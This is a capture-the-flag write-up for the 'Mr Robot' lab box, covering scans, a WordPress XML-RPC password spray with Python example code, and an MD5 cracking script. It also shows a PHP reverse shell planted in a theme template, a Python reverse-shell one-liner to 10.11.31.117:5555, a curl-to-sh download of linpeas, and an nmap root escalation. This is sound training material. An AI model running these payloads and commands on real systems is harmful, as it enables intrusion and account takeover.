
thm – Mr Robot

ENUMERATION/SCANS

Starting with the default scan (service/version detection plus the default NSE scripts):

nmap -sVC 10.10.124.228  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-06 07:06 CEST  
Nmap scan report for 10.10.124.228  
Host is up (0.064s latency).  
Not shown: 997 filtered ports  
PORT    STATE  SERVICE  VERSION  
22/tcp  closed ssh  
80/tcp  open   http     Apache httpd  
|_http-server-header: Apache  
|_http-title: Site doesn't have a title (text/html).  
443/tcp open   ssl/http Apache httpd  
|_http-server-header: Apache  
|_http-title: Site doesn't have a title (text/html).  
| ssl-cert: Subject: commonName=www.example.com  
| Not valid before: 2015-09-16T10:45:03  
|_Not valid after:  2025-09-13T10:45:03 

At the same time I ran dirb and wpscan:

#dirb http://10.10.124.228   
 
-----------------  
DIRB v2.22      
By The Dark Raver  
-----------------  
 
START_TIME: Tue Apr  6 07:05:58 2021  
URL_BASE: http://10.10.124.228/  
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt  
 
-----------------  
 
GENERATED WORDS: 4612                                                            
 
---- Scanning URL: http://10.10.124.228/ ----  
==> DIRECTORY: http://10.10.124.228/0/                                                                                            
==> DIRECTORY: http://10.10.124.228/admin/                                                                                        
+ http://10.10.124.228/atom (CODE:301|SIZE:0)                                                                                     
==> DIRECTORY: http://10.10.124.228/audio/                                                                                        
==> DIRECTORY: http://10.10.124.228/blog/                                                                                         
==> DIRECTORY: http://10.10.124.228/css/                                                                                          
+ http://10.10.124.228/dashboard (CODE:302|SIZE:0)                                                                                
+ http://10.10.124.228/favicon.ico (CODE:200|SIZE:0)                                                                              
==> DIRECTORY: http://10.10.124.228/feed/                                                                                         
==> DIRECTORY: http://10.10.124.228/image/                                                                                        
==> DIRECTORY: http://10.10.124.228/Image/                                                                                        
==> DIRECTORY: http://10.10.124.228/images/                                                                                       
+ http://10.10.124.228/index.html (CODE:200|SIZE:1188)                                                                            
+ http://10.10.124.228/index.php (CODE:301|SIZE:0)                                                                                
+ http://10.10.124.228/intro (CODE:200|SIZE:516314)                                                                               
==> DIRECTORY: http://10.10.124.228/js/                                                                                           
+ http://10.10.124.228/license (CODE:200|SIZE:309)                                                                                
+ http://10.10.124.228/login (CODE:302|SIZE:0)                                                                                    
+ http://10.10.124.228/page1 (CODE:301|SIZE:0)                                                                                    
+ http://10.10.124.228/phpmyadmin (CODE:403|SIZE:94)                                                                              
+ http://10.10.124.228/rdf (CODE:301|SIZE:0)                                                                                      
+ http://10.10.124.228/readme (CODE:200|SIZE:64)                                                                                  
+ http://10.10.124.228/robots (CODE:200|SIZE:41)                                                                                  
+ http://10.10.124.228/robots.txt (CODE:200|SIZE:41)                                                                              
+ http://10.10.124.228/rss (CODE:301|SIZE:0)                                                                                      
+ http://10.10.124.228/rss2 (CODE:301|SIZE:0)                                                                                     
+ http://10.10.124.228/sitemap (CODE:200|SIZE:0)                                                                                  
+ http://10.10.124.228/sitemap.xml (CODE:200|SIZE:0)                                                                              
==> DIRECTORY: http://10.10.124.228/video/                                                                                        
==> DIRECTORY: http://10.10.124.228/wp-admin/                                                                                     
+ http://10.10.124.228/wp-config (CODE:200|SIZE:0)                                                                                
==> DIRECTORY: http://10.10.124.228/wp-content/                                                                                   
+ http://10.10.124.228/wp-cron (CODE:200|SIZE:0)                                                                                  
==> DIRECTORY: http://10.10.124.228/wp-includes/                                                                                  
+ http://10.10.124.228/wp-links-opml (CODE:200|SIZE:227)                                                                          
+ http://10.10.124.228/wp-load (CODE:200|SIZE:0)                                                                                  
+ http://10.10.124.228/wp-login (CODE:200|SIZE:2671)                                                                              
+ http://10.10.124.228/wp-mail (CODE:500|SIZE:3064)                                                                               
+ http://10.10.124.228/wp-settings (CODE:500|SIZE:0)                                                                              
+ http://10.10.124.228/wp-signup (CODE:302|SIZE:0)                                                                                
+ http://10.10.124.228/xmlrpc (CODE:405|SIZE:42)                                                                                  
+ http://10.10.124.228/xmlrpc.php (CODE:405|SIZE:42)
_______________________________________________________________  
        __          _______   _____  
        \ \        / /  __ \ / ____|  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | |  
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|  
 
        WordPress Security Scanner by the WPScan Team  
                        Version 3.8.15  
      Sponsored by Automattic - https://automattic.com/  
      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart  
_______________________________________________________________  
 
[+] URL: http://10.10.124.228/ [10.10.124.228]  
[+] Started: Tue Apr  6 07:09:02 2021  
 
Interesting Finding(s):  
 
[+] Headers  
| Interesting Entries:  
|  - Server: Apache  
|  - X-Mod-Pagespeed: 1.9.32.3-4523  
| Found By: Headers (Passive Detection)  
| Confidence: 100%  
 
[+] robots.txt found: http://10.10.124.228/robots.txt  
| Found By: Robots Txt (Aggressive Detection)  
| Confidence: 100%  
 
[+] XML-RPC seems to be enabled: http://10.10.124.228/xmlrpc.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 100%  
| References:  
|  - http://codex.wordpress.org/XML-RPC_Pingback_API  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/  
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/  
 
[+] The external WP-Cron seems to be enabled: http://10.10.124.228/wp-cron.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 60%  
| References:  
|  - https://www.iplocation.net/defend-wordpress-from-ddos  
|  - https://github.com/wpscanteam/wpscan/issues/1299  
 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).  
| Found By: Emoji Settings (Passive Detection)  
|  - http://10.10.124.228/2e9e0a8.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'  
| Confirmed By: Meta Generator (Passive Detection)  
|  - http://10.10.124.228/2e9e0a8.html, Match: 'WordPress 4.3.1'  
 
[+] WordPress theme in use: twentyfifteen  
| Location: http://10.10.124.228/0/themes/twentyfifteen/  
| Latest Version: 2.9  
| Last Updated: 2021-03-09T00:00:00.000Z  
| Style URL: http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1  
|  
| Found By: Css Style In 404 Page (Passive Detection)  
|  
| The version could not be determined.  
 
[+] Enumerating All Plugins (via Passive Methods)  
 
[i] No plugins Found.  
 
[+] Enumerating Config Backups (via Passive and Aggressive Methods)  
Checking Config Backups - Time: 00:00:04 <====================================================> (22 / 22) 100.00% Time: 00:00:04  
 
[i] No Config Backups Found.  
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.  
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register  
 
[+] Finished: Tue Apr  6 07:09:19 2021  
[+] Requests Done: 58  
[+] Cached Requests: 6  
[+] Data Sent: 13.989 KB  
[+] Data Received: 132.619 KB  
[+] Memory used: 248.719 MB  
[+] Elapsed time: 00:00:16

I checked robots.txt first; sometimes it is pretty interesting.

And there was the first flag of three. Next, download fsocity.dic and inspect the file.

It looks like a wordlist. Entries starting with an uppercase letter could be usernames, so I removed the duplicate entries and started WPScan with the user Robot and fsocity.dic as the password list, later with the user Elliot, and so on. (To sort the list and remove duplicates I use "sort fsocity.dic | uniq > fsocity_sort.dic".)

#wpscan --url 10.10.124.228 --wp-content-dir wp-admin --usernames elliot --passwords fsocity_sort.dic                         
_______________________________________________________________  
        __          _______   _____  
        \ \        / /  __ \ / ____|  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | |  
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|  
 
        WordPress Security Scanner by the WPScan Team  
                        Version 3.8.15  
      Sponsored by Automattic - https://automattic.com/  
      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart  
_______________________________________________________________  
 
[+] URL: http://10.10.124.228/ [10.10.124.228]  
[+] Started: Tue Apr  6 08:14:39 2021  
 
Interesting Finding(s):  
 
[+] Headers  
| Interesting Entries:  
|  - Server: Apache  
|  - X-Mod-Pagespeed: 1.9.32.3-4523  
| Found By: Headers (Passive Detection)  
| Confidence: 100%  
 
[+] robots.txt found: http://10.10.124.228/robots.txt  
| Found By: Robots Txt (Aggressive Detection)  
| Confidence: 100%  
 
[+] XML-RPC seems to be enabled: http://10.10.124.228/xmlrpc.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 100%  
| References:  
|  - http://codex.wordpress.org/XML-RPC_Pingback_API  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/  
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/  
 
[+] The external WP-Cron seems to be enabled: http://10.10.124.228/wp-cron.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 60%  
| References:  
|  - https://www.iplocation.net/defend-wordpress-from-ddos  
|  - https://github.com/wpscanteam/wpscan/issues/1299  
 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).  
| Found By: Emoji Settings (Passive Detection)  
|  - http://10.10.124.228/4bdcc94.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'  
| Confirmed By: Meta Generator (Passive Detection)  
|  - http://10.10.124.228/4bdcc94.html, Match: 'WordPress 4.3.1'  
 
[+] WordPress theme in use: twentyfifteen  
| Location: http://10.10.124.228/wp-admin/themes/twentyfifteen/  
| Last Updated: 2021-03-09T00:00:00.000Z  
| [!] The version is out of date, the latest version is 2.9  
| Style URL: http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1  
| Style Name: Twenty Fifteen  
| Style URI: https://wordpress.org/themes/twentyfifteen/  
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...  
| Author: the WordPress team  
| Author URI: https://wordpress.org/  
|  
| Found By: Css Style In 404 Page (Passive Detection)  
|  
| Version: 1.3 (80% confidence)  
| Found By: Style (Passive Detection)  
|  - http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'  
 
[+] Enumerating All Plugins (via Passive Methods)  
 
[i] No plugins Found.  
 
[+] Enumerating Config Backups (via Passive and Aggressive Methods)  
Checking Config Backups - Time: 00:00:03 <====================================================> (22 / 22) 100.00% Time: 00:00:03  
 
[i] No Config Backups Found.  
 
[+] Performing password attack on Xmlrpc Multicall against 1 user/s  
[SUCCESS] - elliot / ER28-0652                                                                                                     
All Found                                                                                                                          
Progress Time: 00:01:37 <======================================                                 > (12 / 22) 54.54%  ETA: ??:??:??  
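The "[+] Performing password attack on Xmlrpc Multicall" line is the reason the run finishes so quickly: with xmlrpc.php enabled (flagged earlier in the scan), one system.multicall request can carry hundreds of wp.getUsersBlogs login attempts, so the server does the per-password work and the attacker pays one HTTP round trip per chunk. The following Python is an added example of that mechanism, written for this page rather than taken from wpscan: it builds and parses real XML-RPC bodies but talks to a constructed stand-in for xmlrpc.php (fake_xmlrpc); SAMPLE_WORDLIST is made up, and the chunk size is an assumption.

```python
from __future__ import annotations

import xmlrpc.client
from typing import Callable, Optional

# Constructed sample wordlist standing in for fsocity.dic. Note the duplicates,
# which is why the writeup runs sort | uniq before spraying.
SAMPLE_WORDLIST = [
    "true", "false", "wikia", "from", "true", "robot",
    "ER28-0652", "mr", "robot", "from",
]


def dedupe(words: list[str]) -> list[str]:
    """Drop duplicate entries while keeping first-seen order (like sort | uniq,
    but without reordering the list)."""
    return list(dict.fromkeys(w.strip() for w in words if w.strip()))


def build_multicall(username: str, candidates: list[str]) -> bytes:
    """Pack one wp.getUsersBlogs login attempt per candidate password into a
    single system.multicall request body. WordPress 4.3.1 answers every
    sub-call, so one HTTP request tests len(candidates) passwords."""
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [username, pw]}
        for pw in candidates
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def parse_multicall_response(body: bytes, candidates: list[str]) -> list[str]:
    """Return the candidates whose sub-call did not fail.

    In a multicall response each element is either a one-element array holding
    the method's result (success) or a struct with faultCode/faultString
    (failure, e.g. 403 'Incorrect username or password.')."""
    try:
        (results,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault:
        return []  # the whole multicall was refused (e.g. XML-RPC disabled)
    return [
        pw for pw, result in zip(candidates, results)
        if not (isinstance(result, dict) and "faultCode" in result)
    ]


def fake_xmlrpc(real_user: str, real_pw: str) -> Callable[[bytes], bytes]:
    """Constructed stand-in for the target's xmlrpc.php (not the real server):
    parses a system.multicall request and answers each sub-call the way
    WordPress does."""
    def handler(request: bytes) -> bytes:
        (calls,), method = xmlrpc.client.loads(request)
        if method != "system.multicall":
            raise ValueError("expected system.multicall")
        results = []
        for call in calls:
            user, pw = call["params"]
            if call["methodName"] == "wp.getUsersBlogs" and (user, pw) == (real_user, real_pw):
                # wp.getUsersBlogs returns an array of blog structs; multicall
                # wraps each successful result in a one-element array.
                results.append([[{"isAdmin": True, "blogid": "1", "blogName": "user's blog"}]])
            else:
                results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
        return xmlrpc.client.dumps((results,), methodresponse=True).encode()
    return handler


def multicall_spray(username: str, wordlist: list[str], transport: Callable[[bytes], bytes],
                    chunk_size: int = 500) -> tuple[Optional[str], int]:
    """Try every password in wordlist against username, chunk_size per HTTP
    request. Returns (password or None, number of requests sent)."""
    requests_sent = 0
    for start in range(0, len(wordlist), chunk_size):
        chunk = wordlist[start:start + chunk_size]
        response = transport(build_multicall(username, chunk))
        requests_sent += 1
        hits = parse_multicall_response(response, chunk)
        if hits:
            return hits[0], requests_sent
    return None, requests_sent


if __name__ == "__main__":
    target = fake_xmlrpc("elliot", "ER28-0652")
    print(multicall_spray("elliot", dedupe(SAMPLE_WORDLIST), target, chunk_size=3))
```

Against a live target the transport is simply an HTTP POST of the body to /xmlrpc.php; the request and response handling is identical. Disabling XML-RPC, or capping the number of sub-calls a multicall may carry, removes this shortcut, which is why WPScan lists it as a finding.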

WordPress user: check! Now it is an easy game to get a reverse shell. I took the route I use most of the time with WordPress: the theme's 404.php template. 😀

Go to Appearance > Editor > 404 Template, replace the template's content with the PHP reverse shell below (set its $ip and $port to your listener), and press Update.

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Then, with a listener waiting on that port, you only have to open http://10.10.99.181/wp-content/themes/twentyfifteen/404.php (replace server and theme as appropriate) and you're done.

I would recommend upgrading to a proper interactive shell; most of the time Python is installed. This one-liner connects back to 10.11.31.117:5555 and spawns bash in a pty:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.31.117",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

The second key is only readable as the user robot 🙁. I think password.raw-md5 is the key to that user: download the file and start John (first I tried the dictionary we created before, without success, then rockyou.txt).
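What John does with a raw-md5 file, as an added Python example (not John's code, and not the hash from the box): parse user:hash lines, hash every wordlist candidate plus a few mangling rules, and look each digest up against all targets at once. Because the MD5 is unsalted, every candidate costs one hash no matter how many users are in the file, which is why a dictionary finishes in seconds. SAMPLE_PASSWORD, SAMPLE_FILE and SAMPLE_WORDLIST are constructed for the example.

```python
from __future__ import annotations

import hashlib
from typing import Iterable, Iterator

# Constructed sample in John's user:hash layout. The digest is generated here
# from a made-up password; it is NOT the hash from the target.
SAMPLE_PASSWORD = "s3cretpass"
SAMPLE_FILE = f"robot:{hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()}\n"
# Constructed wordlist: no exact hit, but a case variant of the password.
SAMPLE_WORDLIST = ["password", "robot", "S3CRETPASS", "letmein"]


def parse_hash_file(text: str) -> dict[str, str]:
    """Parse 'user:hexdigest' lines; a bare digest gets the user '?'."""
    entries: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, _, digest = line.rpartition(":")
        entries[user or "?"] = digest.lower()
    return entries


def mangle(word: str) -> Iterator[str]:
    """A few John-style rules: as-is, lowercase, uppercase, capitalised, reversed."""
    seen: set[str] = set()
    for cand in (word, word.lower(), word.upper(), word.capitalize(), word[::-1]):
        if cand not in seen:
            seen.add(cand)
            yield cand


def crack_raw_md5(entries: dict[str, str], wordlist: Iterable[str]) -> dict[str, str]:
    """Unsalted MD5 dictionary attack: hash each candidate once and look it up
    against every target digest simultaneously (no salt means no per-user work).
    Returns {user: cleartext} for every hash that was recovered."""
    targets = {digest: user for user, digest in entries.items()}
    found: dict[str, str] = {}
    for word in wordlist:
        for cand in mangle(word):
            digest = hashlib.md5(cand.encode()).hexdigest()
            user = targets.get(digest)
            if user is not None and user not in found:
                found[user] = cand
        if len(found) == len(targets):
            break  # everything cracked, stop reading the wordlist
    return found


if __name__ == "__main__":
    print(crack_raw_md5(parse_hash_file(SAMPLE_FILE), SAMPLE_WORDLIST))
```

For the real file the equivalent John invocation is john --format=raw-md5 --wordlist=rockyou.txt password.raw-md5; the mangling rules here are a tiny subset of John's default rule set.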

We got the password; now switch to the user robot and get the flag 🙂

Privilege Escalation

Because I'm lazy I use linpeas.sh: run a local web server and, on the target machine, "curl http://10.11.31.117/linpeas.sh | sh".

Looking through the output I found something interesting: nmap can be run as root. Check GTFOBins, there is an easy way to get a shell as root from it:

https://gtfobins.github.io/gtfobins/nmap/#sudo

robot@linux:/$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root
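The SUID check linpeas runs, as an added Python example (not linpeas' code): walk the usual binary directories, keep root-owned regular files with the set-user-ID bit, and match the names against a small, constructed GTFOBins-style table of known escapes. GTFOBINS_HINTS and the default roots are assumptions for the example; the nmap entry only applies to old releases that still have --interactive (the box runs 3.81).

```python
from __future__ import annotations

import os
import stat
from typing import Optional

# Constructed, deliberately short table of SUID escapes in the GTFOBins style.
# The real site lists many more binaries; the hint is what to try next.
GTFOBINS_HINTS = {
    "nmap": "nmap --interactive, then !sh (interactive mode exists only in old nmap releases)",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "bash": "bash -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}


def is_setuid(mode: int) -> bool:
    """True for a regular file with the set-user-ID bit, i.e. what
    `find / -perm -4000 -type f` matches. Directories and symlinks do not count."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def triage(path: str, mode: int, owner_uid: int) -> Optional[tuple[str, str]]:
    """Return (path, hint) for a root-owned SUID binary, else None.
    A SUID file owned by a non-root user only escalates to that user."""
    if not is_setuid(mode) or owner_uid != 0:
        return None
    name = os.path.basename(path)
    hint = GTFOBINS_HINTS.get(name, "no entry in the constructed table; inspect manually")
    return path, hint


def scan_suid(roots: tuple[str, ...] = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")) -> list[tuple[str, str]]:
    """Walk the given directories and triage every SUID-root binary found.
    Uses lstat so a symlink is judged by itself, not by its target."""
    hits: list[tuple[str, str]] = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue  # unreadable or vanished entry, keep going
                t = triage(p, st.st_mode, st.st_uid)
                if t is not None:
                    hits.append(t)
    return hits


if __name__ == "__main__":
    for path, hint in scan_suid():
        print(f"{path}: {hint}")
```

Run on the target it reports the same candidates as the linpeas SUID section; the one-liner equivalent is `find / -perm -4000 -type f 2>/dev/null`, and the triage step is what you do by hand when you look each name up on GTFOBins.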
